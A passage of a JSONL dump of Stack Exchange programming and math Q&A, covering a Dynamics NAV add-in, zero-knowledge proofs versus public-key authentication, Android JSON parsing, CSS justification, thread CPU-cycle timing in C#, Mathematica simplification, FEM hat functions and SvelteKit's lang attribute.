\"Co\u00fbt:\" + coutL;\n \/\/lb_Cout.Width = 60;\n lb_Cout.Top = 20;\n\n TTL.SetToolTip(pn, TooltipLCout);\n pn.Controls.Add(lb_Duree);\n pn.Controls.Add(lb_Cout);\n MainPanel.Controls.Add(pn);\n }\n<\/code>\nI need to add the total of the rows and columns as TotalRoles and TotalOperations, and i need to pass to dynamics the lastposition of my textboxes in horizontal and vertical, + 1 for getting the right position. How can i do this? Any help most welcome. Thanks\nComment: Is this for a Silverlight control? We need more details about where exactly the code is going to execute.\nComment: Hi Nicknow, the code is going to execute as a CtrlAddIn for NAV 2013 CRM.\nComment: Okay, so what part of your question is specific to Dynamics CRM? Also, you should add the Dynamics NAV (I'll do an edit for you) to get the right audience.\nComment: C'est quoi ce commentaire en espagnol quand les autres sont en fran\u00e7ais ? (et au mieux, pour ici, les mettre en anglais).\nComment: traduce : WTF is that spanish comment when all others are in french ? Better to do all in english when posting on Stackoverflow.\nComment: First comment: \"changing the properties to do the table as i want\"\nComment: Second comment: \"I have to delete the space left after dimensioning the cells\"...\nAnswer: The control add-in should render the same as a Custom Control in Visual Studio, however there may be some default margins applied. Check that your margin property is set on your textboxes to explicitly set it to zero.\nAlso, put your controls inside a better container such as a Panel, TableLayoutPanel or FlowLayoutPanel. These more specialized controls should make it easier to arrange the child elements without having to manually calculate positions, etc.\nMatrix Forms in RTC\nDynamics NAV already has the ability to display matrix-style forms -- is there a particular use-case where a custom matrix add-in would be more applicable? Distributing a client-side control add-in DLL to all users can be difficult to debug and maintain.\nThere are walkthroughs on MSDN which explain the process of migrating the classic Matrix forms to the RTC client if that is your underlying objective.\nComment: Developing RoleTailored Client Control Add-ins, this is what i am doing. I explain: I have a main panel, Inside it i want to add some other panels that will contain arrays of textboxes, one of them will be bidimensional and the rest unidimensionals arrays. But my problem is that i can't see the elements Inside the panels. I can see all the panels but no the elements.\nComment: Without any sample code, it's difficult to say. I'd make sure you're adding your panels to the parent control. Try adding something basic like a label to ensure they're displaying at all. More documentation can be found on MSDN -- http:\/\/msdn.microsoft.com\/en-us\/library\/dd983826(v=nav.70).aspx\nComment: i have just refresh my code for you too see, thanks for any help\n","meta":{"source":"stackoverflow","title":"Control Add-In for Nav Matrix of textbox(bidimensional) in C#","dup_signals":{}},"subset":"stackexchange"} +{"text":"Public key authentication as zero-knowledge proof?\n\nQuestion: I've been reading up a bit on zero-knowledge proofs and how they are applied to authentication, specifically the PAKE protocol and the SRP and OPAQUE implementations. From my (limited) understanding this seems similar to Public Key authentication (for example as used as a means of authentication in SSH) or Personal Access Tokens (as used in most Git platforms like Gitlab, Github, Bitbucket or Azure). Could one therefore state that Public Key authentication is an example of zero-knowledge proofs? Or am I missing something here? Does the public key convey some knowledge of the private key?\nComment: I googled your question title and this was the first hit: https:\/\/doubleoctopus.com\/security-wiki\/protocol\/zero-knowledge-proof\/#:~:text=One%20example%20for%20zero%2Dknowledge,the%20prover%20has%20the%20key.\nComment: Yes, they state \"One example for zero-knowledge authentication is when a prover has an asymmetric key-pair (e.g. RSA, EC)\", though I've read (or understood) otherwise in other places. Eg [here](https:\/\/crypto.stackexchange.com\/questions\/35177\/is-using-digital-signatures-to-prove-identity-a-zero-knowledge-proof) (not the same question, but similar) there are comments regarding \"I want to prove to YOU (...), but I don't want you to be able to convince anyone else that you interacted with (me)\"\nAnswer: Could one therefore state that Public Key authentication is an example of zero-knowledge proofs?\nYes and No, it is related to but still distinct from a zero-knowledge proof.\nI think the discussion https:\/\/www.reddit.com\/r\/crypto\/comments\/75quwb\/how_is_a_zeroknowledge_proof_different_than_rsa\/ will answer your question.\nIn <code>public key authentication<\/code>, the scheme is based on public key cryptography, using cryptosystems where encryption and decryption are done using separate keys, and it is not feasible to derive the decryption key from the encryption key. Each user creates a public\/private key pair for authentication purposes. The server knows the public key, and only the user knows the private key.\nIn cryptography, a <code>zero-knowledge proof<\/code> or zero-knowledge protocol is a method by which one party (the prover) can prove to another party (the verifier) that a given statement is true while the prover avoids conveying any additional information apart from the fact that the statement is indeed true.\nZero-knowledge authentication is when a prover convinces a verifier that she is in possession of an identifying secret, without revealing the secret itself.\nAn example of that could be using an asymmetric private-public key pair, with the private key acting as the verifier of the information requested. The verifier sends a challenge or request using the public key, and the prover responds using the private key to confirm the information. The public-private key \"handshake\" convinces the verifier that the prover's key meets the criteria, resulting in successful authentication.\nSome refer to this as ZKKSP: https:\/\/coingeek.com\/zero-knowledge-key-statement-proof\/\nSee more here:\n\nhttps:\/\/github.com\/matter-labs\/awesome-zero-knowledge-proofs\nhttps:\/\/crypto.stackexchange.com\/questions\/89875\/are-zero-knowledge-proofs-alternative-private-key-encryption\nhttps:\/\/crypto.stackexchange.com\/questions\/92178\/zero-knowledge-rsa-public-key\nhttps:\/\/crypto.stackexchange.com\/questions\/64059\/are-ssh-key-pairs-an-example-of-a-zero-knowledge-proof\nhttps:\/\/crypto.stackexchange.com\/questions\/10595\/when-would-one-prefer-a-proof-of-knowledge-instead-of-a-zero-knowledge-proof?rq=1\nhttps:\/\/crypto.stackexchange.com\/questions\/25338\/why-arent-zero-knowledge-proofs-used-in-practice-for-authentication?rq=1\nComment: To me the Reddit post doesn't answer very much - they seem to have gone off on a bit of a tangent (I understand the poster probably was asking a similar question to mine, but the answers seem to compare PK auth with ZKP in general, not ZKP auth in particular). However _your_ answer is much more helpful. PK auth would basically be a ZKKSP protocol, no? I find it strange it is never really mentioned as such, considering the interest in ZKP.\nComment: And, if I understand correctly, even if PK auth is zero-knowledge, protocols like SRP\/OPAQUE are interesting from a usability point of view (especially on the web) as the user doesn't need to save a private key anywhere or keep it safe.\n","meta":{"source":"security.stackexchange","title":"Public key authentication as zero-knowledge proof?","dup_signals":{}},"subset":"stackexchange"} +{"text":"extracting value from a JSONArray in Android\n\nQuestion: I have this JSON Object\n<code>{\n\"kind\": \"books#volumes\",\n \"totalItems\": 482,\n \"items\": [\n {\n \"kind\": \"books#volume\",\n \"id\": \"MoXpe6H2B5gC\",\n \"etag\": \"6dr4Ka3Iksc\",\n \"selfLink\": \"https:\/\/www.googleapis.com\/books\/v1\/volumes\/MoXpe6H2B5gC\",\n \"volumeInfo\": {\n \"title\": \"Android in The Attic\",\n \"authors\": [\n \"Nicholas Allan\"\n ],\n \"publisher\": \"Hachette UK\",\n \"publishedDate\": \"2013-01-03\",\n \"description\": \"Aunt Edna has created a no-nonsense nanny android to make sure Billy and Alfie don't have any fun. But then Alfie discovers how to override Auntie Anne-Droid's programming and nothing can stop them eating all the Cheeki Choko Cherry Cakes they like ... until the real aunt Edna is kidnapped!\",\n<\/code>\nI have to extract 3 keys \"title\", \"author\", and \"description\" by this code snippet:\n<code>JSONObject baseJsonResponse = new JSONObject(bookJSON);\n\n \/\/ Extract the JSONArray associated with the key called \"features\",\n \/\/ which represents a list of features (or books).\n JSONArray bookArray = baseJsonResponse.getJSONArray(\"items\");\n\n \/\/ For each book in the bookArray, create an {@link book} object\n for (int i = 0; i < bookArray.length(); i++) {\n\n \/\/ Get a single book at position i within the list of books\n JSONObject currentBook = bookArray.getJSONObject(i);\n\n \/\/ For a given book, extract the JSONObject associated with the\n \/\/ key called \"volumeInfo\", which represents a list of all volumeInfo\n \/\/ for that book.\n JSONObject volumeInfo = currentBook.getJSONObject(\"volumeInfo\");\n\n \/\/ Extract the value for the key called \"title\"\n String title = volumeInfo.getString(\"title\");\n\n \/\/ Extract the value for the key called \"authors\"\n String authors = volumeInfo.getString(\"author\");\n\n \/\/ Extract the value for the key called \"description\"\n String description = volumeInfo.getString(\"description\");\n<\/code>\nThe \"title\" and \"description\" worked fine, but the author part didn't. As I can see, \"author\" is actually an JSONArray, so my output on screen is\n<code>[\"Nicholas Allan\"]\n<\/code>\nwhich is not what I desired. So, I tried to change my approach and extract the element by this code\n<code>JSONArray author = volumeInfo.getJSONArray(\"authors\");\n String authors = author.get(0);\n<\/code>\nBut Android Studio said the input of method get() must be a String.\nI'm new to JSON and Android so I have never seen a JSON key without a value like this one. Can anyone tell me how can I extract an element from a JSONArray?\nAnswer: Since the <code>get()<\/code> method returns an Object, you would need to cast it to a String:\n<code>String authors = (String) author.get(0);\n<\/code>\nAlternatively, you could use JSONArray's <code>getString(index)<\/code> method, where <code>0<\/code> is the index. \n<code>JSONArray author = volumeInfo.getJSONArray(\"authors\");\nString authors = author.getString(0);\n<\/code>\n","meta":{"source":"stackoverflow","title":"extracting value from a JSONArray in Android","dup_signals":{}},"subset":"stackexchange"} +{"text":"text-align justify not working\n\nQuestion: I'm trying to justify the text within this p tag so that it perfectly fits the width of the p.\n<code><p align=\"justify\" style=\"text-align: justify !important; color:#fff; margin:0px; font-weight:bold; width:487px; border:Solid 1px red;\">blah blah blah<\/p>\n<\/code>\nbut the text just wont justify! any idea why? \nthanks for any help.\nAnswer: You can use the solution described here:\nhttp:\/\/blog.vjeux.com\/2011\/css\/css-one-line-justify.html\nThis will justify a single line but adds a space after, so if you know the height, you can specify it with <code>overflow:hidden<\/code> to conceal it and still get the justification.\n\n<code>.fulljustify {\n text-align:justify;\n }\n .fulljustify:after {\n content: \"\";\n display: inline-block;\n width: 100%; \n }\n #tagline {\n height: 80px;\n overflow: hidden;\n line-height: 80px; \/* vert-center *\/\n }<\/code>\n<code><p id=\"tagline\" class=\"fulljustify\">Blah blah blah<\/p><\/code>\nComment: For a single line, this\nComment: this doesn't work in IE8 and FF lower versions. do you know some way to implement without using `:after` pseudo code and `content`? thanks\nAnswer: If your text doesn't span more than one line, justifying doesn't do anything. Your text has to wrap to the next line, and then the FIRST line will be justified, but not the second.\nComment: darn. so theres no css way to justify 4 words in a 487 width p?\nComment: is correct. You also needed to change the `color` from white on a white background to see this. http:\/\/jsfiddle.net\/5RpQr\/\nComment: @jason gennaro - yeah, i spent a minute trying to figure out why i didn't see anything in the fiddle... haha\nComment: .haha\n\n@phil, see my answer for a possible other solution re justifying four words\nComment: Wow, that's really confusing, e.g. when in ckeditor setting the first line to justify, you won't see any changes. I wasted an hour figuring that out, thinking the plugin was broken. Hah!\nAnswer: Chrome doesn't support it but in Firefox and IE, you can use <code>text-align-last: justify;<\/code>. For a cross-browser solution, we have to use what @onemanarmy posted ;)\nComment: As of Dec 2016, this is now supported in all major browsers (65%) and is the best solution.\nComment: Doesn't work in Safari. It's the default browser on OS X, so I'd consider it a major browser.\nComment: Yes, this is now the best (and simplest) solution.Works great in chrome.\nComment: This is the solution I was looking for. Works in chrome too. Thanks a lot\nAnswer: If you wanted to justify four words in <code>487px<\/code> you could try using <code>word-spacing<\/code> in your <code>css<\/code>.\nI used <code>word-spacing:8em;<\/code> for <code>bla bla bla bla<\/code> but you could adjust as necessary.\nhttp:\/\/jsfiddle.net\/5RpQr\/1\/\nComment: @phil - Just remember that if you change your words, the word spacing must change too\nAnswer: try this\nfor div\n<code>div {\ntext-align:justify;\ntext-justify: inter-word;\ntext-align-last:center;\n\/* for IE9 *\/\n-ms-text-align-last:center;\n}\n<\/code>\nComment: thanks, you saved my bacon. I love how these CSS styles were created without any planning, by pushing it forward with the belly.\nAnswer: There is also something similar, like display: flex; justify-content: space-around; if you would wrap those texts in spans or divs\nAnswer: In my case for < p > tag, works with easy way:\n<code>p {\n text-align: justify;\n text-justify: inter-word;\n}\n<\/code>\nhttps:\/\/css-tricks.com\/almanac\/properties\/t\/text-justify\/\nAnswer: To make it look good on Chrome & opera (multiline justify looks bad on them)\nI use the following\n<code>.fulljustify {\n text-align: justify;\n display: table-row;\n text-align-last: left;\n}\n<\/code>\nAnswer: Chrome solution:\nIf you don't want to mess with the display properties (in my case aligning an anchor tag of a carousel img):\n<code>text-align: -webkit-center;<\/code>\nComment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](\/help\/how-to-answer).\nAnswer: It worked for me this way:\n<code><div className={s.element}> {text} <\/div>\n\n.element {\n text-align:justify;\n word-wrap: break-word;\n hyphens: auto;\n}\n<\/code>\nAnswer: You better try \n<code>style=\"text-align:justifty;display:inline-block;\"\n<\/code>\nAnswer: Just use <code>style=\"text-align:justify\"<\/code>.\nIt works in all browsers.\nComment: some kind of explanation would be helpful, won't it? he obiviously used your styles...\nComment: @Ron If you want to justify whole paragraph except last row use above trick, and if you want to justify last line also then use ` .justify:after{content: \"\"; display: inline-block; width: 100%;}` and no need to define height.\nComment: he already use the inline css with `text-align: justify` , Please reconsider to give op solution.\n","meta":{"source":"stackoverflow","title":"text-align justify not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"Measure CPU cycles of a Function Call\n\nQuestion: I'm looking for a way to measure the cpu cycles a function call on a thread takes.\nExample pseudo code:\n<code>void HostFunction()\n{\n var startTick = CurrentThread.CurrentTick; \/\/does not exist\n\n ChildFunction();\n\n var endTick = CurrentThread.CurrentTick; \/\/does not exist\n\n var childFunctionCost = endTick - startTick;\n}\n\nvoid ChildFunction() \n{\n \/\/Do whatever...\n\n Thread.Sleep(3000);\n\n \/\/Do some more...\n}\n<\/code>\nI don't want to use a Stopwatch or some other time measurement, because it would include any time that the thread is sleeping, which I do not want to measure. I only want to measure real work.\nThis measurement needs to work at runtime, as in my pseudo code, as the results are used to determine if the child function should be allowed to continue to run (my real case is a plugin-type architecture), so a profiling tool won't help me.\nComment: consider this solution (GetThreadTimes): http:\/\/stackoverflow.com\/questions\/26472936\/why-does-getthreadtimes-return\/26475906#26475906 (not the code, just the calls) The code is in serious need of help, but the breakdown of the results might be of interest.\nComment: Is there anything that prevents the plug-in from spawning additional threads and\/or using the threadpool? If not then basing scheduling on current thread times will not yield the desired result.\nComment: @BrianRasmussen, yes I am using Mono.Cecil to scan all the Type Refs, and if any namespaces\/types that manage threads are used, it's automatically excluded.\nComment: Thank you all for your answers. I think I'll end up going with the solution by @HansPassant, as it appears to return the value in cycle units (not time units). For my case, my plugin spec requires a fixed number of allowed cycles for the child function call, regardless of the speed of the CPU, so based on my limited understanding on this subject, I'm figuring that cycles would be the better way to do that.\nAnswer: You can pinvoke QueryThreadCycleTime(). Check the link for details.\nSome sample code:\n<code>using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\n\nclass Program {\n static void Main(string[] args) {\n ulong start, end;\n start = NativeMethods.GetThreadCycles();\n System.Threading.Thread.Sleep(1000);\n end = NativeMethods.GetThreadCycles();\n ulong cycles = end - start;\n Debug.Assert(cycles < 200000);\n }\n\n static class NativeMethods {\n public static ulong GetThreadCycles() {\n ulong cycles;\n if (!QueryThreadCycleTime(PseudoHandle, out cycles))\n throw new System.ComponentModel.Win32Exception();\n return cycles;\n }\n [DllImport(\"kernel32.dll\", SetLastError = true)]\n private static extern bool QueryThreadCycleTime(IntPtr hThread, out ulong cycles);\n private static readonly IntPtr PseudoHandle = (IntPtr)(-2);\n\n }\n}\n<\/code>\nComment: @HansPassant Just out of curiosity, how did you come up with the PseudoHandle? Is there a documentation of that value?\nComment: Do you know if the value returned by this function is updated in (near) real-time or does it suffer the same issue that GetThreadTimes has namely that it only gets updated on a clock interrupt?\nComment: Easy to try for yourself, just call it twice. Yes.\nComment: Good point. Sorry for being lazy. It does indeed get updated on every call, as far as I can tell.\nComment: No, it is secret knowledge. You can ask a question about it :)\nComment: @HansPassant You are quite cruel... It took me at least 20 minutes to discover what *-2* is... It is quite hidden :-) and since hans was cruel, I'll tell everyone that *-2* is the what `GetCurrentThread()` always returns (see for example http:\/\/blogs.msdn.com\/b\/oldnewthing\/archive\/2014\/10\/15\/10564700.aspx where it is explained in the comments)\nAnswer: Based on the comment I provided above, consider the following code:\n<code>using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\nusing System.Threading;\n\nnamespace FunctionTiming\n{\n class Program\n {\n private static Thread _thread;\n private static IntPtr _threadHandle;\n\n static void Main(string[] args)\n {\n _thread = new Thread(new ThreadStart(Program.TargetFunction));\n _thread.Start();\n _thread.Join();\n\n System.Runtime.InteropServices.ComTypes.FILETIME start, end, rawKernelTime, rawUserTime;\n bool result = GetThreadTimes(_threadHandle, out start, out end, out rawKernelTime, out rawUserTime);\n Debug.Assert(result);\n\n ulong uLow = (ulong)rawKernelTime.dwLowDateTime;\n ulong uHigh = (uint)rawKernelTime.dwHighDateTime;\n uHigh = uHigh << 32;\n long kernelTime = (long)(uHigh | uLow);\n\n uLow = (ulong)rawUserTime.dwLowDateTime;\n uHigh = (uint)rawUserTime.dwHighDateTime;\n uHigh = uHigh << 32;\n long userTime = (long)(uHigh | uLow);\n\n Debug.WriteLine(\"Kernel time: \" + kernelTime);\n Debug.WriteLine(\"User time: \" + userTime);\n Debug.WriteLine(\"Combined raw execution time: \" + (kernelTime + userTime));\n\n long functionTime = (kernelTime + userTime) \/ 10000;\n Debug.WriteLine(\"Funciton Time: \" + functionTime + \" milliseconds\");\n }\n\n static void TargetFunction()\n {\n IntPtr processHandle = GetCurrentProcess();\n bool result = DuplicateHandle(processHandle, GetCurrentThread(), processHandle, out _threadHandle, 0, false, (uint)DuplicateOptions.DUPLICATE_SAME_ACCESS);\n\n double value = 9876543.0d;\n for (int i = 0; i < 100000; ++i)\n value = Math.Cos(value);\n\n Thread.Sleep(3000);\n\n value = 9876543.0d;\n for (int i = 0; i < 100000; ++i)\n value = Math.Cos(value);\n }\n\n [DllImport(\"kernel32.dll\", SetLastError = true)]\n static extern bool GetThreadTimes(IntPtr hThread,\n out System.Runtime.InteropServices.ComTypes.FILETIME lpCreationTime, out System.Runtime.InteropServices.ComTypes.FILETIME lpExitTime,\n out System.Runtime.InteropServices.ComTypes.FILETIME lpKernelTime, out System.Runtime.InteropServices.ComTypes.FILETIME lpUserTime);\n\n [DllImport(\"kernel32.dll\")]\n private static extern IntPtr GetCurrentThread();\n\n [DllImport(\"kernel32.dll\", SetLastError = true)]\n [return: MarshalAs(UnmanagedType.Bool)]\n static extern bool DuplicateHandle(IntPtr hSourceProcessHandle,\n IntPtr hSourceHandle, IntPtr hTargetProcessHandle, out IntPtr lpTargetHandle,\n uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);\n\n [Flags]\n public enum DuplicateOptions : uint\n {\n DUPLICATE_CLOSE_SOURCE = (0x00000001),\/\/ Closes the source handle. This occurs regardless of any error status returned.\n DUPLICATE_SAME_ACCESS = (0x00000002), \/\/Ignores the dwDesiredAccess parameter. The duplicate handle has the same access as the source handle.\n }\n\n [DllImport(\"kernel32.dll\")]\n static extern IntPtr GetCurrentProcess();\n }\n}\n<\/code>\nwhich produces the following result (on my older machine):\n<code>Kernel time: 0\nUser time: 156250\nCombined raw execution time: 156250\nFunction time: 15 milliseconds\n<\/code>\nYou can clearly see that the 3 seconds of sleeping is not being included.\nHope this helps.\nComment: You can't get better resolution than the clock tick interrupt rate. Default is 64 interrupts\/second. Or 15.625 msec, as you can tell.\nComment: @Jeff, Thanks for your answer. Compared to Hans' answer though, it looks rather complex. Is there any benefit to using this one compared to his? Hans, same question.\nComment: @NathanA - Both strategies can provide sufficient results. And the code above is verbose, and can be abstracted how you like. The intent was simply to provide straight forward code that will compile that you can test with.\nComment: @NathanA - After testing with the code Hans provided, I agree. It is a better solution, and I am glad that he provided it.\n","meta":{"source":"stackoverflow","title":"Measure CPU cycles of a Function Call","dup_signals":{}},"subset":"stackexchange"} +{"text":"can I expand non-integer powers\n\nQuestion: How can I help Mma to recognize that <code>w<\/code> can be factored out of <code>(a w)^a (w - a w)^(1 - a)<\/code>. Assumptions: w>0 and 1>a>0.\nComment: `FullSimplify[ExpandAll[(a w)^a (w - a w)^(1 - a)] , {w > 0 , 1 > a > 0}]` gets the `w` outside.\nComment: @Coolwater Thanks. I had tried this with `PowerExpand` instead of `ExpandAll`, and that did not work.\nAnswer: <code>Assuming[w > 0 && 1 > a > 0, \n Collect[(a w)^a (w - a w)^(1 - a), w, Simplify]]\n<\/code>\n$\\ $ <code>(1 - a)^(1 - a) a^a w<\/code>\n\n<code>Simplify[Cancel[(a w)^a (w - a w)^(1 - a)], Assumptions -> w > 0 && 1 > a > 0]\n<\/code>\n$\\ $ <code>-(-1 + a) (a\/(1 - a))^a w<\/code>\n \n<code>Simplify[Together[(a w)^a (w - a w)^(1 - a)], Assumptions -> w > 0 && 1 > a > 0]\n<\/code>\n$\\ $ <code>-(-1 + a) (a\/(1 - a))^a w<\/code>\n\n<code>Simplify[Factor[(a w)^a (w - a w)^(1 - a)], Assumptions -> w > 0 && 1 > a > 0]\n<\/code>\n$\\ $ <code>-(-1 + a) (a\/(1 - a))^a w<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"can I expand non-integer powers","dup_signals":{}},"subset":"stackexchange"} +{"text":"Piecewise Continuous Linear Basis on a Triangular Mesh\n\nQuestion: Question\nGiven a FEM mesh, I would like to define a set of basis functions \nanchored to the mesh, so that any piecewise linear continuous function on the mesh can be expanded over that set.\nSuch a basis is possibly called <code>ElementShapeFunction<\/code> in the FEM framework?\nAttempt\nLet us consider \n<code>mesh0 = ToElementMesh[RegionUnion[Disk[], Rectangle[{0, 0}, {2, 2}]], \n MaxCellMeasure -> 0.125, AccuracyGoal -> 1, \n MeshQualityGoal -> \"Maximal\",\n \"MeshOrder\" -> 1, \"MeshElementType\" -> TriangleElement]\n<\/code>\nGiven this mesh, I should be able to construct a set linear piecewise \ngeneralisation of indicator function (pyramide-like) \nwhich should look like this: \n\nwhere the top dark red vertex is above the middle red vertex.\n\nI understand that the FEM tools allow me to identify the triangles\n<code>me = mesh0[\"MeshElements\"][[1, 1]]; nn = Length[me];\nTable[{Hue[i\/nn], Polygon@mesh0[\"Coordinates\"][[me[[i]]]]}, {i, nn}] \/\/ Graphics\n<\/code>\n\nThanks to @user21, I also gathered how to extract the linear piecewise function \non a regular (unit) triangle \n<code>Table[Table[{r, s, \n ElementShapeFunction[TriangleElement, 1][r, s][[i]]},\n {s, 0, 1, 1\/100}, {r, 0, s, 1\/100}] \/\/ Flatten[#, 1] & \/\/ \n ListContourPlot[#, Axes -> True] &,\n {i, 3}]\n<\/code>\n\nI also vaguely recall that the transformation to the \nregular triangle involve the inverse of $$ \\left(\n\\begin{array}{ccc}\n 1 & 1 & 1 \\\\\n x_1 & x_2 & x_3 \\\\\n y_1 & y_2 & y_3 \\\\\n\\end{array}\n\\right)$$\nwhere the $(x_i,y_i)$ are the coordinates of the 3 vertices of the triangles.\nSo in principle I am all set to define my basis function.\nBut my target to have a basis which is consistent with the way \nthings are done within the FEM package. This I cannot easily do with some help\nfrom people who know its internals. I truly believe this basis could be useful\nto many projects, beyond my own, especially if it is consistent with the logic of \nthe package.\n\nSo I am after a function which would take mesh as an argument \n and return a list of $\\cal N_i$ functions such as plotted above,\n so that any linear function on the mesh can be written unambiguously as a sum over these.\n\nThe format of these functions should ideally generalise that of the existing <code>BSplineFunction<\/code> for triangular meshes. Internally they should correspond to a piecewise description of the linear interpolation over the relevant triangles. \n\nOne complication I can see arises from e.g. the top left blue triangle which is not part of a polyhedra. \nIdeally one wants to have special basis elements on the edges which can be non zero, or with a given slope. \n\nThe latter requirement is possibly achieved by counting the outer vertex as \na double (or triple) knot, as is done for BSplines? \nEventually, this basis could be replacing the constant piecewise function, or for a regular mesh those presented in this answer .\nComment: To put that hat function on \"the right hand side\" of the equation (and that's what I guess is what you are about to do), it typically suffices to multiply the corresponding vector my the mass matrix (and to adjust the boundary degrees of freedom to match the boundary conditions). At least, that's the case for typical elliptic equations.\nComment: The point to efficiency in the finite element method is to avoid explicit representations of the basis functions, but to work only with the coordinates with respect to such a basis. If you generate your mesh with `ToElementMesh` with `MeshOrder->1` then mass and stiffness matrix are already assembled with respect to this basis. If you have $n$ vertices, then the \"hat function\" of vertex $i$ ($=1$ at that vertex, $=0$ at all other vertices and piecewise linear in between) is represented by the `i`-th basis vector of the standard basis on $\\mathbb{R}^n$.\nComment: @HenrikSchumacher you know better than me, BUT it seems to me that mathematica has both `LinearInterpolation` and `BSplineBasis` which serve different purpose. And I am trying to implement 1-Spline on a triangular mesh because you showed me how to write Laplacian Penalty function on such basis :-)\nComment: @HenrikSchumacher re':it typically suffices to multiply' please please please could you give an example while answering this question https:\/\/mathematica.stackexchange.com\/questions\/216747\/inverting-differential-equation-using-finite-element-methods? I apologise to be so clueless about FEM.\nComment: Even if it is inefficient it could be educationally useful to be able to access such basis? In the spirit of a top down approach to learning FEM (as discussed by @user21 at some earlier stage on this site), or in the spirit of this elegant answer https:\/\/mathematica.stackexchange.com\/a\/110210\/1089\nAnswer: Okay, here a small example for an elliptic boundary value problem.\n(I am reusing some old code over and over again, so user21 will certainly remind me again that a couple of things can be simplified... ;) )\nLet's start with my favorite region.\n<code>Needs[\"NDSolve`FEM`\"]\n(*Initialization of Finite Element Method*)\nR = ToElementMesh[\n BoundaryMeshRegion[\n Map[t \\[Function] (2 + Cos[5 t])\/3 {Cos[t], Sin[t]}, \n Most@Subdivide[0., 2. Pi, 2000]], \n Line[Partition[Range[2000], 2, 1, 1]]\n ],\n MaxCellMeasure -> 0.001,\n \"MeshOrder\" -> 1\n ];\npts = R[\"Coordinates\"];\nn = Length[pts];\nvd = NDSolve`VariableData[{\"DependentVariables\", \"Space\"} -> {{u}, {x, y}}];\nsd = NDSolve`SolutionData[{\"Space\"} -> {R}];\ncdata = InitializePDECoefficients[vd, sd,\n \"DiffusionCoefficients\" -> {{-IdentityMatrix[2]}},\n \"MassCoefficients\" -> {{1}}\n ];\nmdata = InitializePDEMethodData[vd, sd];\n\n(*Discretization*)\ndpde = DiscretizePDE[cdata, mdata, sd];\nstiffness = dpde[\"StiffnessMatrix\"];\nmass = dpde[\"MassMatrix\"];\n<\/code>\nThis supplies us with a stiffness matrix <code>stiffness<\/code> and a mass matrix <code>mass<\/code>, both assembled with repect to a basis of piecewise linear hat functions. We will need them only\nLet's choose a vertex somewhere in the middle and represent its hat function as a vector with respect to the basis function. (In the following, I put my comments into the codes so that it is easier to copy.)\n<code>i = Nearest[pts -> \"Index\", {0., 0.1}][[1]];\nhatfun = ConstantArray[0., n];\nhatfun[[i]] = 1.;\n\n(*This is how to interpolate it. *)\n\nhatfuninterpolated = ElementMeshInterpolation[{R}, hatfun];\nplot1 = Plot3D[hatfuninterpolated[x, y], {x, y} \\[Element] R, \n NormalsFunction -> None]; \/\/ AbsoluteTiming \/\/ First\n\n(*But the interpolation is actually not needed because the graph of the function can be plotted like this:*)\nscale = 2\/3;\nplot2 = Graphics3D[{\n GraphicsComplex[Join[pts, scale Partition[hatfun, 1], 2], \n Polygon[R[\"MeshElements\"][[1, 1]]]]\n }]; \/\/ AbsoluteTiming \/\/ First\n\nGraphicsRow[{plot1, plot2}, ImageSize -> Large]\n<\/code>\n\n0.251001\n0.000127\n\nNotice the difference in the timings. That's basically the reason why I say you should avoid interpolation function as much as possible.\nOkay, let's go an. We want to see how to use <code>hatfun<\/code> as the right hand side $b$ of the pde $\\Delta u = b$ in $\\varOmega$ and $u|_{\\partial \\varOmega} = f$.\n<code>(*Finding boundary and interior degrees of freedoms.*)\n\nbndplist = \n Sort@DeleteDuplicates[Flatten[R[\"BoundaryElements\"][[All, 1]]]];\nintplist = Complement[Range[n], bndplist];\n\n(*This is what DeployBoundaryConditions does to the stiffness matrix*)\n\nsystemmatrix = stiffness;\nsystemmatrix[[bndplist]] = \n IdentityMatrix[n, SparseArray, \n WorkingPrecision -> MachinePrecision][[bndplist]];\n\n(*Factorizing the system matrix.*)\n\nS = LinearSolve[systemmatrix, Method -> \"Pardiso\"];\n<\/code>\nThis is all that we have to do for the system matrix.\n<code>(*This is how the NDSolve`FEM` builds the load vector (a.k.a. the \\\nright hand side). *)\nload = mass.hatfun;\n\n(*f is a function that specifies the Dirichlet boundary conditions.*)\n\nf = {x, y} \\[Function] 0.0001 Sin[25 ArcTan[x, y]];\n(*This is what DeployBoundaryConditions does to the load vector*)\n\nload[[bndplist]] = f @@@ pts[[bndplist]];\n\n(*Solving the actual equation.*)\nsolution = S[load];\n\n(*Plotting via interpolation.*)\n\nsolutioninterpolated = ElementMeshInterpolation[{R}, solution];\nplot1 = Plot3D[solutioninterpolated[x, y], {x, y} \\[Element] R, \n NormalsFunction -> None, PlotRange -> All]; \/\/ \n AbsoluteTiming \/\/ First\n\n(*Fast plotting*)\nscale = 1200;\nplot2 = Graphics3D[{\n GraphicsComplex[Join[pts, scale Partition[solution, 1], 2], \n Polygon[R[\"MeshElements\"][[1, 1]]]]\n }]; \/\/ AbsoluteTiming \/\/ First\n\nGraphicsRow[{plot1, plot2}, ImageSize -> Large]\n<\/code>\n\n0.241259\n0.000119\nComment: Thanks a lot: this is exactly what I wanted :-) Here are 2 examples from your code https:\/\/www.dropbox.com\/s\/jpqs4mtesdnqf7w\/cool.png?dl=0\nComment: or identifying all basis elements : https:\/\/www.dropbox.com\/s\/m9ku7igdwyia87v\/cool2.png?dl=0\nComment: You're welcome.\n","meta":{"source":"mathematica.stackexchange","title":"Piecewise Continuous Linear Basis on a Triangular Mesh","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to set lang attribute on tag in SSR mode with SvetleKit\n\nQuestion: I know user's preferred language in cookie and I am able to init locales with it (using server hook).\nAnd I would like to also render correct lang attribute which matches selected locale.\nAnswer: There are docs on specifically that.\n\nIf your content is available in multiple languages, you should set the lang attribute based on the language of the current page. You can do this with SvelteKit's handle hook:\n<code>src\/app.html<\/code>\n<code><html lang=\"%lang%\">\n<\/code>\n<code>src\/hooks.server.ts<\/code>\n<code>import type { RequestEvent, Handle } from '@sveltejs\/kit';\nexport const handle = (({ event, resolve }) => {\n return resolve(event, {\n transformPageChunk: ({ html }) =>\n html.replace('%lang%', get_lang(event))\n });\n}) satisfies Handle;\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to set lang attribute on 